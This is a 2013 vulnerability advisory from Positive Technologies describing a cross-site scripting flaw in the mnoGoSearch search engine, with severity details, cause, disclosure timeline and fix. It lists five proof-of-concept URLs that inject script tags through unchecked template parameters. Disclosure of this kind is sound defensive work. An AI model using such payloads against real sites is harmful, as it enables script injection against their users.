mnoGoSearch
Version: 3.3.12 and earlier
Application link:
<http://www.mnogosearch.org/>
Severity level: Medium
Impact: Cross-Site Scripting (XSS)
Access Vector: Remote
CVSS v2:
Base Score: 4.3
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVE: not assigned
Software description
mnoGoSearch is a universal Intranet and Internet search engine.
Positive Technologies experts have detected a Cross-Site Scripting vulnerability in mnoGoSearch.
Due to incorrect application architecture, all the template variables and variables sent by the client are stored in the same list. This vulnerability allows attackers to overwrite any uninitialized variables used in the template. Overwriting parameters, which are displayed on the web page without processing, results in multiple cross-site scripting vulnerabilities.
Exploitation example
http://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=a
Update your software up to the latest version.
15.02.2013 - Vendor gets vulnerability details
01.03.2013 - Vendor releases fixed version and details
05.03.2013 - Public disclosure
The vulnerabilities has discovered by Sergey Bobrov, Positive Research Center (Positive Technologies Company)
<http://en.securitylab.ru/lab/PT-2013-18>
<http://www.mnogosearch.org/bugs/index.php?id=4819>
Reports on the vulnerabilities previously discovered by Positive Research:
<http://ptsecurity.com/research/advisory/>
<http://en.securitylab.ru/lab/>